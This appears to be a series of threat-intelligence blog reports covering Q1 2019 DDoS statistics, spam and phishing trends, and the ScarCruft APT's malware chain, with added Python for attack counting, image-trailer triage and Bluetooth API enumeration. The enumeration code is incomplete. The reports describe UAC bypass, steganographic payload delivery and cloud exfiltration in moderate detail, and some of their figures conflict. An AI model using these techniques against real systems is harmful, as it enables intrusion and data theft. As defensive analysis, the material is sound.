Later that same month, a US court handed down a 10-year jail term to a Massachusetts hacker for conducting DDoS attacks against two health facilities. Also in January, a hacker-for-hire was arrested in Britain for having incapacitated mobile networks in Liberia and Germany (at the peak of his criminal career in 2015, he took the whole of Liberia offline). Although his “work history” is far longer than that, no other charges were brought.

The shockwaves from last year’s operation to close down Webstresser.org — one of the most notorious sites providing DDoS attack services — continue to spread. Cyber police decided to go after not just the attack organizers, but the customers as well. At the end of January, Europol announced the arrest of more than 250 users in Britain and the Netherlands. Instead of prison, one of the convicted cybercriminals will receive an alternative punishment under the Dutch Hack_Right program, aimed at rehabilitating young hackers arrested for the first time. Other sources report that an investigation is underway into all 150,000 Webstresser clients resident in 20 different countries.

Yet despite the law enforcement efforts, DDoS attacks remain a real threat to business. As a Neustar International Security Council survey of 200 senior technical staff members of large companies revealed, firms today consider DDoS attacks to be a serious problem: 52% of security teams have already faced them, and 75% are concerned about the issue.

Quarter trends

Last quarter, we made two predictions about trends in the DDoS attack market: first, that the market overall would contract; second, that demand for long-term “smart” attacks, in particular HTTP flooding, would grow.

The first did not happen: Kaspersky DDoS Protection statistics show that all DDoS attack indicators increased last quarter. The total number of attacks climbed by 84%, and the number of sustained (over 60 minutes) DDoS sessions precisely doubled. The average duration increased by 4.21 times, while the segment of extremely long attacks posted a massive 487% growth.

This forces a reassessment of the assumption made in last year’s Q3 and Q4 reports that the decrease in DDoS activity is linked to cybercriminals switching to the more reliable and profitable cryptocurrency mining. Clearly, this hypothesis is at least partially wrong.

There is another, more likely explanation: over the last six months of the previous year, we have been observing less the redistribution of botnet capacity for other purposes and more the emergence of a market vacuum. Most likely, the supply deficit was linked to the clamping down on DDoS attacks, the closure of sites selling related services, and the arrest of some major players over the past year. Now it seems the vacuum is being filled: such explosive growth in the indicators is almost certainly due to the appearance of new suppliers and clients of DDoS services. It will be interesting to observe how this trend develops in Q2. Will the indicators continue to rise, or will the market settle at the current level?

The second prediction (growing demand for smart application-level attacks) was more accurate: the share of long, harder-to-organize attacks is still growing, both qualitatively and quantitatively. We see no reason why this trend should not continue throughout Q2.

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q1 2019.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.
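The counting rule above (same target and same botnet: one attack while the gap between activity periods is under 24 hours, a new attack once it reaches 24 hours; different botnets against one target: separate attacks) is mechanical enough to state as code. What follows is an added worked example of that methodology, not Kaspersky’s DDoS Intelligence code. The observations are constructed (TEST-NET addresses, made-up botnet identifiers), and the summary also applies the report’s “sustained” threshold of more than 60 minutes.

```python
"""Count DDoS attacks from bot-activity observations using the report's rule.

Added example of the methodology, not Kaspersky's DDoS Intelligence code. Rule:
observations with the same target and botnet belong to one attack while the
gap between them is under 24 hours; a gap of 24 hours or more starts a new
attack; different botnets hitting one target are separate attacks. The
observations below are constructed (TEST-NET addresses).
"""
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

NEW_ATTACK_GAP = timedelta(hours=24)
SUSTAINED = timedelta(minutes=60)

Observation = Tuple[str, str, datetime]  # (target IP, botnet id, time a command was seen)
Session = Tuple[datetime, datetime]       # (first command, last command) of one attack


def count_attacks(observations: Iterable[Observation]) -> Dict[Tuple[str, str], List[Session]]:
    """Group observations into attack sessions per (target, botnet)."""
    stamps: Dict[Tuple[str, str], List[datetime]] = {}
    for target, botnet, ts in observations:
        stamps.setdefault((target, botnet), []).append(ts)
    attacks: Dict[Tuple[str, str], List[Session]] = {}
    for key, times in stamps.items():
        times.sort()
        sessions: List[Session] = []
        start = prev = times[0]
        for ts in times[1:]:
            if ts - prev >= NEW_ATTACK_GAP:  # 24 h or more since the last activity: new attack
                sessions.append((start, prev))
                start = ts
            prev = ts
        sessions.append((start, prev))
        attacks[key] = sessions
    return attacks


def summarize(attacks: Dict[Tuple[str, str], List[Session]]) -> Dict[str, int]:
    """Totals in the report's terms: attacks, unique targets (by IP), sustained sessions (> 60 min)."""
    return {
        "attacks": sum(len(s) for s in attacks.values()),
        "unique_targets": len({target for target, _ in attacks}),
        "sustained": sum(1 for s in attacks.values() for start, end in s if end - start > SUSTAINED),
    }


SAMPLE_OBSERVATIONS: List[Observation] = [
    ("203.0.113.7", "botnet-A", datetime(2019, 3, 16, 10, 0)),
    ("203.0.113.7", "botnet-A", datetime(2019, 3, 16, 10, 30)),
    ("203.0.113.7", "botnet-A", datetime(2019, 3, 16, 11, 30)),  # one 90-minute session so far
    ("203.0.113.7", "botnet-A", datetime(2019, 3, 17, 12, 0)),   # 24.5 h after the last command: new attack
    ("203.0.113.7", "botnet-B", datetime(2019, 3, 16, 10, 5)),   # different botnet: separate attack
    ("198.51.100.9", "botnet-A", datetime(2019, 1, 17, 3, 0)),
    ("198.51.100.9", "botnet-A", datetime(2019, 1, 17, 3, 10)),
]

if __name__ == "__main__":
    result = count_attacks(SAMPLE_OBSERVATIONS)
    for (target, botnet), sessions in result.items():
        for start, end in sessions:
            print(f"{target} by {botnet}: {start} -> {end}")
    print(summarize(result))
```

The gap is measured from the last observed activity, not from the start of the previous session, which is why the fourth observation above opens a new attack even though it is more than 24 hours from the first command only when counted from the third.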

Quarter summary
  • In terms of the geographical distribution of attacks, China remains out in front. Having nearly surrendered top spot at the end of 2018, it consolidated its positions in Q1 2019.
  • The geographical distribution of targets roughly mirrors the geographical distribution of attacks: the Top 3 were again China (59.85%), the US (21.28%), and Hong Kong (4.21%).
  • Both geographic Top 10s saw relatively little reshuffling compared to previous quarters. There was no more sudden growth observed in botnet activity in unexpected places.
  • DDoS attacks peaked in the second half of March; the quietest period was January.
  • The most dangerous day of the week for DDoS attacks was Saturday, while Sunday remains the calmest.
  • The maximum attack duration decreased by more than a day against the previous quarter, although the percentage share of sustained DDoS sessions continued to rise and amounted to 21.34% (versus 16.66% in Q4 2018).
  • The share of SYN flooding increased to 84%, bringing down the share of UDP and TCP flood, while the share of HTTP and ICMP attacks rose to 3.3% and 0.6%, respectively.
  • The share of Linux botnets decreased slightly, but still remains predominant (95.71%).
  • Most botnet C&C servers are still located in the US (34.10%), with the Netherlands in second place (12.72%), and Russia in third (10.40%). It is notable that the once perennial leader, South Korea, returned to the Top 10, albeit in last place (2.31%).
Attack geography

China remains the leader by number of outgoing attacks. It even returned to its previous level after a drop in previous quarters: its share rose from 50.43% to 67.89%. In second place came the US, although its share was reduced from 24.90% to 17.17%. Third place belonged to Hong Kong, up from seventh, increasing its share from 1.84% to 4.81%.

Interestingly, except for China and Hong Kong, all other countries’ shares decreased. This did not prevent the US from retaining second position; meanwhile, Australia, having taken bronze at the end of 2018, dropped to last place, down 4 p.p. (from 4.57% to 0.56%).

Among other significant changes, it is worth noting Britain, which fell from fifth to seventh place having shed 1.52 p.p. (from 2.18% to 0.66%), as well as Canada and Saudi Arabia. Each of the latter two lost around 1 p.p., but that did not stop Canada (0.86%) climbing from sixth to fourth, while Saudi Arabia (0.58%) dropped down a rung towards the foot of the table.

Brazil, meanwhile, dropped out of the Top 10 altogether, making way for Singapore, which came straight in at number 5 with 0.82% of attacks (tellingly, its share too was down on the previous quarter, albeit very slightly).

South Korea, which previously juggled second and third place with the US, remains outside the Top 10 (accounting for 0.30% of attacks). However, although the Top 10 still looks slightly odd to us, there was no repeat of the out-of-the-blue changes observed in the past three quarters.


Distribution of DDoS attacks by country, Q4 2018 and Q1 2019

The results of the geographical distribution of targets are consistent with the geographical distribution of the attacks themselves: China is once again in first position (its share up from 43.26% to 59.85%), with the US in second (down from 29.14% to 21.28%) and Hong Kong in third (climbing from 1.76% to 4.21%).

Saudi Arabia dropped from fifth to sixth place, losing slightly more than 1 p.p. (its share decreased from 2.23% to 1.08%). Canada shed roughly the same amount (from 2.21% to 1.30%), yet rose from sixth to fourth place, while Britain’s more significant loss (from 2.73% to 1.18%) pushed it from fourth to fifth.

In the meantime, the Top 10 said goodbye to Australia and Brazil, which last quarter ranked third and eighth, respectively. They were replaced by Singapore, whose insignificant growth (from 0.72% to 0.94%) was enough to claim eighth place, and Poland, which saw its share nudge up from 0.33% to 0.90%, in ninth position. As before, the Top 10 was rounded off by Germany (0.77%).

Distribution of unique DDoS-attack targets by country, Q4 2018 and Q1 2019

Dynamics of the number of DDoS attacks

In the last quarter, the most DDoS activity was observed in March, especially the second half. The highest peak was on March 16 (699 attacks). And a significant surge occurred on January 17, when we registered 532 attacks. Early January was calm as expected, with no prominent spikes or troughs; however, the quietest day of all was February 5 with a total of 51 attacks.

Dynamics of the number of DDoS attacks in Q1 2019

As for the distribution by day of the week, activity last quarter clearly shifted to the weekend: Saturday was the most intensive day (accounting for 16.65% of attacks), with Friday in second place (15.39%). Sundays saw a relative lull — just 11.41% of attacks. Recall that in late 2018 Thursday had the largest share of DDoS attacks (15.74%), with Sunday again the most peaceful.

Distribution of DDoS attacks by day of the week, Q4 2018 and Q1 2019

Duration and types of DDoS attacks

In Q1, the share of sustained attacks almost doubled — from 0.11% to 0.21%. However, instead of lasting almost 14 days (329 hours) as in Q4 2018, the longest attack this quarter was just slightly more than 12 days (289 hours).

On top of that, the share of all attacks lasting more than five hours increased significantly: whereas at the end of 2018 it was 16.66%, now the figure stands at 21.34%. If this segment is sliced into smaller sections, as seen on the graph, most categories of long-duration attacks experienced a rise, while only the proportion of attacks lasting 100–139 hours decreased slightly (from 0.14% to 0.11%). Accordingly, the share of short-duration attacks fell by almost 5 p.p. to 78.66%.

Distribution of DDoS attacks by duration (hours), Q4 2018 and Q1 2019

As in previous years, SYN flooding made up the lion’s share of junk traffic in Q1. Compared to Q4 2018, its share was even greater, climbing to 84.1%. Naturally, such a large rise (up from 58.2%, more than 20 p.p.) had an impact on the shares of other types of traffic.

For instance, UDP flooding, despite holding on to second spot, had a Q1 share of just 8.9% (down from 31.1%). The share of TCP flooding, previously ranked third, also dropped (from 8.4% to 3.1%), only good enough for fourth place behind HTTP flooding (which grew by 1.1 p.p. to 3.3%). ICMP traffic finished last as per tradition, despite its share rising from 0.1% to 0.6%.

Distribution of DDoS attacks by type, Q1 2019

Linux botnets still vastly outnumber their Windows-based counterparts, although in Q1 2019 the gap closed slightly: Linux botnets now account for 95.71% of attacks rather than 97.11%, while the share of Windows botnets rose by 1.4 p.p. to 4.29%. This is not because Windows bots are becoming more popular, but because the number of C&C servers of the Linux-based Mirai bot and its Darkai clone declined; as a result, the number of attacks by these two bots fell threefold and sevenfold, respectively.

Ratio of Windows/Linux botnet attacks, Q4 2018 and Q1 2019

Botnet distribution geography

The leading country by number of botnet C&C servers on its soil remains the US (34.10%). The Netherlands rose from third in Q4 2018 to second place (12.72%). Third place this time went to Russia (10.40%), which climbed all the way up from seventh. China (7.51%) rose from the foot of the ranking to fourth, just missing out on a return to the Top 3.

Greece and Germany, meanwhile, slipped out of the Top 10, making room for Vietnam (4.05%) in seventh place and South Korea (2.31%) in tenth. The latter had previously led this category for quite some time.

Distribution of botnet C&C servers by country, Q1 2019


In the previous three quarters, we saw some unexpected arrivals in several Top 10s — countries with no major track record as a source of DDoS threats suddenly asserted themselves. But Q1 2019 held no particular surprises, save for countries such as Saudi Arabia, the Netherlands, and Romania maintaining a high level of DDoS activity; in other words, their appearance in the Top 10s cannot be put down to random deviations. Meanwhile, cybercriminals previously based in South Korea seem to be in no hurry to reappear there. It is possible that we are witnessing the establishment of a new distribution of botnets by country.

Also worth noting is the significant decline in the activity of Darkai, one of the Mirai clones: the number of attacks carried out with its help fell sevenfold. Mirai itself was also hit hard, suffering a threefold drop in activity. This factor, among others, goes some way toward explaining the decline in the number and duration of DDoS attacks.

15 May 2019

Spam and phishing in Q1 2019

Quarterly highlights

Valentine’s Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.

New Apple products

Late March saw the unveiling of Apple’s latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

Growth in the number of attempts to redirect users to phishing Apple sites before the presentation

Fake Apple ID login pages

Scammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.

Fake “Kaspersky Lab support service” accounts

All the profiles we detected in Q1 have one thing in common: they offer assistance with the products of one company or another, promising specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not get their issue resolved, they are likely to be defrauded as well.

New Instagram “features”

Last year, we wrote that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full — not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.

As usual in such schemes, the “buyer” is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.

Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

“Dream job” offers from spammers

In Q3 2018, we registered spam messages containing “dream job” offers. This quarter, we logged another major mailing of this kind: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the “cloud service,” the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim’s machine.

Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of “sextortion” — a topic we wrote about last year.

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim’s details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “employee” happened to know that the victim was a well-off individual with a reputation to protect — for which a payment of 10,000 dollars in bitcoin was demanded.

Playing on people’s fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.

Malicious attacks on the corporate sector

In Q1, the corporate sector of the Runet was hit by a malicious spam attack. The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

We also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by spoofing legitimate domains in the sender address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message. For example, they inserted into the message body a phrase about the Christchurch terror attack, hoping that this, plus the name of a New Zealand bank as the sender, would add credibility. The email itself stated that the bank had introduced new security features, and that the recipient had to update their account details in order to use them.

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

Statistics: spam

Proportion of spam in mail traffic

Proportion of spam in global mail traffic, Q4 2018 – Q1 2019

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.

Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

Sources of spam by country

Sources of spam by country, Q1 2019

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).

Spam email size

Spam email size, Q4 2018 – Q1 2019

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

Malicious attachments: malware families

TOP 10 malicious families in mail traffic, Q1 2019

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

Countries targeted by malicious mailshots

Countries targeted by malicious mailshots, Q1 2019

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented 111,832,308 attempts to direct users to scam websites. 12.11% of all Kaspersky Lab users worldwide experienced an attack.

Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

Geography of phishing attacks, Q1 2019

In second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.

Country      %*
Brazil       21.66
Australia    17.20
Spain        16.96
Portugal     16.81
Venezuela    16.72
Greece       15.86
Albania      15.11
Ecuador      14.99
Rwanda       14.89
Georgia      14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

This quarter, the banking sector remains in first place by number of attacks — the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 27.78%.

Distribution of organizations subjected to phishing attacks by category, Q1 2019

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).


In Q1 2019, the average share of spam in global mail traffic rose by less than 0.1 p.p. to 55.97%, and the Anti-Phishing system prevented 111,832,308 redirects to phishing sites, up 35,220,650 on the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

13 May 2019

ScarCruft continues to evolve, introduces Bluetooth harvester

Executive summary

After publishing our initial series of blogposts back in 2016, we have continued to track the ScarCruft threat actor. ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula. The threat actor is highly skilled and, by all appearances, quite resourceful.

We recently discovered some interesting telemetry on this actor and decided to dig deeper into ScarCruft’s recent activity. It shows that the actor is still very active and constantly refining its attack tools. Based on our telemetry, we can reconstruct ScarCruft’s binary infection procedure. It uses a multi-stage binary infection to update each module efficiently and evade detection. In addition, we analyzed the victims of this campaign and spotted an interesting overlap with another APT actor known as DarkHotel.

Multi-stage binary infection

The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises (SWC). As in Operation Daybreak, this actor performs sophisticated attacks using a zero-day exploit. However, sometimes using public exploit code is quicker and more effective for malware authors. We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign.

In order to deploy the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the exploitation step. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. To do so it uses public code: either the privilege-escalation exploit for CVE-2018-8120 or UACME, a UAC-bypass tool normally used by legitimate red teams. Afterwards, the installer creates a downloader and a configuration file from its resource section and executes the downloader. The downloader reads the configuration file and connects to the C2 server to fetch the next payload. In order to evade network-level detection, the downloader uses steganography: what it fetches is an image file with an encrypted malicious payload appended to it, which the downloader then decrypts.

Multi-stage binary infection
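
The post says the downloaded payload is an image file with an encrypted malicious blob appended to it, but gives neither the image format nor the cipher. The triage script below is an added example written for this page, not ScarCruft’s code or Kaspersky’s tooling. It walks the JPEG marker segments (or PNG chunks) to find where the image structurally ends and treats everything after that point as a suspect trailer. This is more robust than searching backwards for the FF D9 end-of-image bytes, because those two bytes can just as easily occur inside the encrypted blob. The single-byte XOR key, the “MZ” check and the sample image bytes are assumptions constructed for the demo; the actual decryption routine used by the downloader is not described in the post.

```python
import struct

# Added example (not ScarCruft's or Kaspersky's code). The XOR key, the "MZ"
# heuristic and the sample bytes below are assumptions for the demo; the post
# does not describe the real encryption of the appended payload.
DEMO_XOR_KEY = 0x2B


def jpeg_end_offset(data: bytes) -> int:
    """Walk the JPEG marker segments and return the offset just past EOI.

    Unlike data.rfind(b"\\xff\\xd9"), this cannot be misled by an FF D9 byte
    pair that happens to occur inside the appended (encrypted) blob.
    """
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG: missing SOI")
    pos, n = 2, len(data)
    while pos + 1 < n:
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                      # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                      # EOI: the image really ends here
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                            # standalone markers carry no length
            continue
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen
        if marker == 0xDA:                      # SOS: skip the entropy-coded data
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break                       # a real marker, not FF00 stuffing or RSTn
                pos += 1
    raise ValueError("truncated JPEG: no EOI")


def png_end_offset(data: bytes) -> int:
    """Walk PNG chunks and return the offset just past the IEND chunk."""
    if not data.startswith(b"\x89PNG\r\n\x1a\n"):
        raise ValueError("not a PNG")
    pos = 8
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length                      # length + type + data + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("truncated PNG: no IEND")


def extract_trailer(data: bytes) -> bytes:
    """Return whatever follows the structural end of a JPEG or PNG file."""
    if data.startswith(b"\xff\xd8"):
        end = jpeg_end_offset(data)
    elif data.startswith(b"\x89PNG"):
        end = png_end_offset(data)
    else:
        raise ValueError("unsupported container")
    return data[end:]


def xor_bytes(blob: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in blob)


def triage_image(data: bytes) -> dict:
    """Report the trailer size and whether the (assumed XOR) decrypt looks like a PE."""
    trailer = extract_trailer(data)
    plain = xor_bytes(trailer, DEMO_XOR_KEY) if trailer else b""
    return {"trailer_len": len(trailer), "looks_like_pe": plain.startswith(b"MZ")}


def build_sample_jpeg() -> bytes:
    """Constructed sample: a minimal JPEG plus a XOR-encrypted stub payload."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"  # contains FF00 stuffing and an RST0 marker
    image = b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9"
    # \xd4\xf2 XOR 0x2B == FF D9, so a naive rfind() would cut the trailer short.
    payload = b"MZ\x90\x00\x03\x00\x00\x00\xd4\xf2demo-implant"
    return image + xor_bytes(payload, DEMO_XOR_KEY)


if __name__ == "__main__":
    sample = build_sample_jpeg()
    print(triage_image(sample))
    naive = len(sample) - (sample.rfind(b"\xff\xd9") + 2)
    print("naive rfind trailer length:", naive, "structural:", len(extract_trailer(sample)))
```

On a real suspect download, read the file into `data` and call `triage_image(data)`; the decryption step then has to be replaced with whatever routine the downloader actually implements, which is why the XOR key here is only a placeholder. The structural walk is the part worth keeping: a trailer of any size after EOI or IEND is already a strong signal on a host that is supposed to be fetching plain images.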

The final payload created by the aforementioned process is a well-known backdoor, which Cisco Talos calls ROKRAT. This cloud-service-based backdoor has many features, one of the main ones being information theft. Upon execution, the malware creates 10 random directory paths, each used for a designated purpose. It spawns 11 threads simultaneously: six threads steal information from the infected host, and five forward the collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service, it uses predefined directory paths such as /english, /video or /scriptout.

Cloud-based backdoor

The same malware contains full-featured backdoor functionality. The commands are downloaded from the /script path of a cloud service provider and the respective execution results are uploaded to the /scriptout path. It supports the following commands, which are enough to fully control the infected host:

  • Get File/Process listing
  • Download additional payload and execute
  • Execute Windows command
  • Update configuration data including cloud service token information
  • Save screenshot and an audio recording

The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration. During our research, we confirmed that they have an interest in mobile devices.

We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information.

  • Instance Name: name of the device
  • Address: address of the device
  • Class: class of the device
  • Connected: whether the device is connected (true or false)
  • Authenticated: whether the device is authenticated (true or false)
  • Remembered: whether the device is a remembered device (true or false)

The attackers appear to be increasing the scope of the information collected from victims.

Build path of Bluetooth information harvester
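
The six fields the harvester saves correspond one-to-one to members of the BLUETOOTH_DEVICE_INFO structure filled in by the Win32 Bluetooth enumeration API (BluetoothFindFirstDevice / BluetoothFindNextDevice, exported by bthprops.cpl), which makes that API a sensible thing to watch for in sandbox traces or API-monitoring logs. The script below is an added example written for this page, not the harvester’s code; the post does not name the exact functions ScarCruft calls, so assuming it is this API is an inference from the field list. The structure layouts follow the public bluetoothapis.h definitions, the `bt_enum_demo` names are mine, and the device record in `build_demo_device()` is constructed for the test, not real telemetry. Live enumeration only works on Windows; the field mapping runs anywhere.

```python
import ctypes
import sys

# Added example, not the harvester's code. Layouts follow bluetoothapis.h;
# build_demo_device() returns constructed sample values, not real telemetry.
BLUETOOTH_MAX_NAME_SIZE = 248
BOOL, DWORD, ULONG, WORD = ctypes.c_int, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint16


class BLUETOOTH_ADDRESS(ctypes.Union):
    _fields_ = [("ullLong", ctypes.c_ulonglong), ("rgBytes", ctypes.c_ubyte * 6)]


class SYSTEMTIME(ctypes.Structure):
    _fields_ = [(n, WORD) for n in ("wYear", "wMonth", "wDayOfWeek", "wDay",
                                    "wHour", "wMinute", "wSecond", "wMilliseconds")]


class BLUETOOTH_DEVICE_INFO(ctypes.Structure):
    _fields_ = [
        ("dwSize", DWORD),
        ("Address", BLUETOOTH_ADDRESS),
        ("ulClassofDevice", ULONG),
        ("fConnected", BOOL),
        ("fRemembered", BOOL),
        ("fAuthenticated", BOOL),
        ("stLastSeen", SYSTEMTIME),
        ("stLastUsed", SYSTEMTIME),
        ("szName", ctypes.c_wchar * BLUETOOTH_MAX_NAME_SIZE),
    ]


class BLUETOOTH_DEVICE_SEARCH_PARAMS(ctypes.Structure):
    _fields_ = [
        ("dwSize", DWORD),
        ("fReturnAuthenticated", BOOL),
        ("fReturnRemembered", BOOL),
        ("fReturnUnknown", BOOL),
        ("fReturnConnected", BOOL),
        ("fIssueInquiry", BOOL),
        ("cTimeoutMultiplier", ctypes.c_ubyte),
        ("hRadio", ctypes.c_void_p),
    ]


def device_info_to_record(info: BLUETOOTH_DEVICE_INFO) -> dict:
    """Map one BLUETOOTH_DEVICE_INFO to the six fields listed in the post."""
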